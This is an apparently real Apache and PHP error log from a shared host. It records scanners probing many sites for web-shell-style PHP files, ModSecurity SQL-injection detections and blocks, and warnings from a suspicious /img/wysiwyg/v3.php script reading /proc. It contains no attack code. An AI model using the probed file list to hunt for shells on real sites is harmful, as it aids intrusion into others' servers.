PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790191/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790191/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790191/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790191/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:37:39.969065 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/file.php
[Mon May 11 19:37:40.131051 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/gettest.php
[Mon May 11 19:37:40.295573 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/gg.php
[Mon May 11 19:37:40.459165 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/goods.php
[Mon May 11 19:37:40.623420 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/maintenance.php
[Mon May 11 19:37:40.782190 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/info.php
[Mon May 11 19:37:40.959007 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/users.php
[Mon May 11 19:37:41.124061 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/install.php
[Mon May 11 19:37:41.286870 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/item.php
[Mon May 11 19:37:41.448880 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/jga.php
[Mon May 11 19:37:41.614013 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/leaf.php
[Mon May 11 19:37:41.779726 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/ms-files.php
[Mon May 11 19:37:41.941859 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/lock.php
[Mon May 11 19:37:42.108981 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/wp-blog-header.php
[Mon May 11 19:37:42.300067 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/lock360.php
[Mon May 11 19:37:42.464950 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/log.php
[Mon May 11 19:37:42.628921 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/manager.php
[Mon May 11 19:37:42.794004 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/meta.php
[Mon May 11 19:37:42.955101 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/mini.php
[Mon May 11 19:37:43.122535 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/mjq.php
[Mon May 11 19:37:43.285132 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/new.php
[Mon May 11 19:37:43.443729 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/onclickfuns.php
[Mon May 11 19:37:43.606117 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/option.php
[Mon May 11 19:37:43.770760 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/plugin-editor.php
[Mon May 11 19:37:43.935867 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/profile.php
[Mon May 11 19:37:44.096362 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/qw_03b4ad31.php
[Mon May 11 19:37:44.262648 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/radio.php
[Mon May 11 19:37:44.421740 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/sf.php
[Mon May 11 19:37:44.581260 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/simple.php
[Mon May 11 19:37:44.746651 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/sql.php
[Mon May 11 19:37:44.911496 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/test.php
[Mon May 11 19:37:45.108187 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/test1.php
[Mon May 11 19:37:45.273051 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/themes.php
[Mon May 11 19:37:45.605674 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/wp-admin.php
[Mon May 11 19:37:45.922700 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/wp-blog-header.php
[Mon May 11 19:37:46.083867 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/wp-config-sample.php
[Mon May 11 19:37:46.903121 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/wp.php
[Mon May 11 19:37:47.257717 2026] [:error] [pid 1502013:tid 1502046] [client 4.193.137.131:10530] File does not exist: /home/piregwan/public_html/xmlrpc.php
[Mon May 11 19:38:12.140246 2026] [authz_core:error] [pid 1516058:tid 1516099] [client 47.128.58.254:12520] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/library/error_log
[Mon May 11 19:38:17.154536 2026] [authz_core:error] [pid 1501883:tid 1501904] [client 216.73.216.110:33534] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/coursecopy/classes/error_log
[Mon May 11 19:38:26.499376 2026] [authz_core:error] [pid 1501883:tid 1501904] [client 216.73.216.110:33534] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/ZF2/error_log
PHP Warning:  filesize(): stat failed for /proc/1704433/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704433/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704433/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704433/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704433/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704433/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/53/task/53/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/53/task/53/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/53/task/53/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/53/task/53/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/53/task/53/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/53/task/53/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:39:13.230203 2026] [ssl:error] [pid 1502013:tid 1502049] (EAI 2)Name or service not known: [client 64.23.221.123:35686] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:13.230404 2026] [ssl:error] [pid 1502013:tid 1502049] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:14.527987 2026] [ssl:error] [pid 1502013:tid 1502047] (EAI 2)Name or service not known: [client 134.199.66.55:38091] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:14.528014 2026] [ssl:error] [pid 1502013:tid 1502047] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:21.965351 2026] [ssl:error] [pid 1501831:tid 1501855] (EAI 2)Name or service not known: [client 178.128.185.37:42712] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:21.965383 2026] [ssl:error] [pid 1501831:tid 1501855] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:27.475889 2026] [ssl:error] [pid 1502013:tid 1502043] (EAI 2)Name or service not known: [client 204.1.151.6:44635] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:27.475914 2026] [ssl:error] [pid 1502013:tid 1502043] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:28.456088 2026] [security2:error] [pid 1516058:tid 1516105] [client 119.28.100.147:38122] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIUUCMeXtzav-mi9SyWMgAAAM8"]
[Mon May 11 19:39:35.091762 2026] [ssl:error] [pid 1511173:tid 1511192] (EAI 2)Name or service not known: [client 24.144.92.215:47808] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:35.091916 2026] [ssl:error] [pid 1511173:tid 1511192] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:36.369771 2026] [ssl:error] [pid 1501883:tid 1501902] (EAI 2)Name or service not known: [client 136.227.172.111:42065] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:36.369812 2026] [ssl:error] [pid 1501883:tid 1501902] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:37.288090 2026] [ssl:error] [pid 1501883:tid 1501907] (EAI 2)Name or service not known: [client 31.204.18.68:46039] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:37.288139 2026] [ssl:error] [pid 1501883:tid 1501907] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:45.575629 2026] [ssl:error] [pid 1516058:tid 1516098] (EAI 2)Name or service not known: [client 146.190.166.31:39080] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:45.575708 2026] [ssl:error] [pid 1516058:tid 1516098] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:48.124318 2026] [ssl:error] [pid 1511173:tid 1511199] (EAI 2)Name or service not known: [client 134.199.70.220:35479] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:48.124352 2026] [ssl:error] [pid 1511173:tid 1511199] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:49.456031 2026] [ssl:error] [pid 1502013:tid 1502059] (EAI 2)Name or service not known: [client 178.171.15.40:39693] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:49.456062 2026] [ssl:error] [pid 1502013:tid 1502059] AH01941: stapling_renew_response: responder error
[Mon May 11 19:39:51.193950 2026] [ssl:error] [pid 1501883:tid 1501901] (EAI 2)Name or service not known: [client 103.216.68.183:36167] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:39:51.193979 2026] [ssl:error] [pid 1501883:tid 1501901] AH01941: stapling_renew_response: responder error
[Mon May 11 19:40:18.038702 2026] [security2:error] [pid 1511173:tid 1511190] [client 162.62.132.25:43780] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/xmlrpc.php"] [unique_id "agIUgvjVc-A-CSptvm1Y4QAAAE4"]
[Mon May 11 19:40:28.024439 2026] [:error] [pid 1511173:tid 1511183] [client 46.151.178.13:40022] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 19:40:30.479676 2026] [security2:error] [pid 1501883:tid 1501895] [client 129.226.94.52:53412] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agIUjjP5Q_-MBliRCAxNjQAAAAo"]
[Mon May 11 19:40:33.787180 2026] [security2:error] [pid 1501883:tid 1501885] [client 170.106.37.134:60292] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/activites/activites-sportives/"] [unique_id "agIUkTP5Q_-MBliRCAxNkAAAAAA"]
[Mon May 11 19:40:37.269294 2026] [security2:error] [pid 1501831:tid 1501841] [client 119.28.177.175:51308] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/book.php"] [unique_id "agIUlVNddpkriGUb6ZVczAAAAQg"]
[Mon May 11 19:40:37.889400 2026] [security2:error] [pid 1501831:tid 1501837] [client 89.187.168.211:55948] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: b92794ce0180688f3662a5e14be21943||1778523036||1778522676"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUlVNddpkriGUb6ZVczQAAAQQ"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:37.889669 2026] [security2:error] [pid 1501831:tid 1501837] [client 89.187.168.211:55948] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUlVNddpkriGUb6ZVczQAAAQQ"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:37.889914 2026] [security2:error] [pid 1501831:tid 1501837] [client 89.187.168.211:55948] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUlVNddpkriGUb6ZVczQAAAQQ"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:38.209733 2026] [security2:error] [pid 1516058:tid 1516102] [client 89.187.168.211:55962] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: b92794ce0180688f3662a5e14be21943||1778523036||1778522676"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUliMeXtzav-mi9SyWpQAAAMw"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:38.209954 2026] [security2:error] [pid 1516058:tid 1516102] [client 89.187.168.211:55962] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUliMeXtzav-mi9SyWpQAAAMw"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:38.210419 2026] [security2:error] [pid 1516058:tid 1516102] [client 89.187.168.211:55962] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUliMeXtzav-mi9SyWpQAAAMw"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:38.566699 2026] [security2:error] [pid 1501831:tid 1501845] [client 89.187.168.211:55972] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: b92794ce0180688f3662a5e14be21943||1778523036||1778522676"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUllNddpkriGUb6ZVczgAAAQw"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:38.566964 2026] [security2:error] [pid 1501831:tid 1501845] [client 89.187.168.211:55972] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUllNddpkriGUb6ZVczgAAAQw"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:38.567373 2026] [security2:error] [pid 1501831:tid 1501845] [client 89.187.168.211:55972] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUllNddpkriGUb6ZVczgAAAQw"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:40.179729 2026] [security2:error] [pid 1501883:tid 1501890] [client 89.187.168.211:55974] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: b92794ce0180688f3662a5e14be21943||1778523036||1778522676"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUmDP5Q_-MBliRCAxNlwAAAAU"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:40.179955 2026] [security2:error] [pid 1501883:tid 1501890] [client 89.187.168.211:55974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUmDP5Q_-MBliRCAxNlwAAAAU"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:40.182063 2026] [security2:error] [pid 1501883:tid 1501890] [client 89.187.168.211:55974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIUmDP5Q_-MBliRCAxNlwAAAAU"], referer: http://la-grande-fabrique.com/?page_id=1928
[Mon May 11 19:40:44.196350 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/file.php
[Mon May 11 19:40:44.354225 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/gettest.php
[Mon May 11 19:40:44.535928 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/gg.php
[Mon May 11 19:40:44.694177 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/goods.php
[Mon May 11 19:40:44.852206 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/maintenance.php
[Mon May 11 19:40:45.035940 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/info.php
[Mon May 11 19:40:45.193925 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/users.php
[Mon May 11 19:40:45.351703 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/install.php
[Mon May 11 19:40:45.509548 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/item.php
[Mon May 11 19:40:45.667645 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/jga.php
[Mon May 11 19:40:45.825547 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/leaf.php
[Mon May 11 19:40:45.983505 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/ms-files.php
[Mon May 11 19:40:46.141349 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/lock.php
[Mon May 11 19:40:46.299226 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/wp-blog-header.php
[Mon May 11 19:40:46.456687 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/lock360.php
[Mon May 11 19:40:46.614399 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/log.php
[Mon May 11 19:40:46.786977 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/manager.php
[Mon May 11 19:40:46.944740 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/meta.php
[Mon May 11 19:40:47.102668 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/mini.php
[Mon May 11 19:40:47.260567 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/mjq.php
[Mon May 11 19:40:47.418554 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/new.php
[Mon May 11 19:40:47.576301 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/onclickfuns.php
[Mon May 11 19:40:47.734151 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/option.php
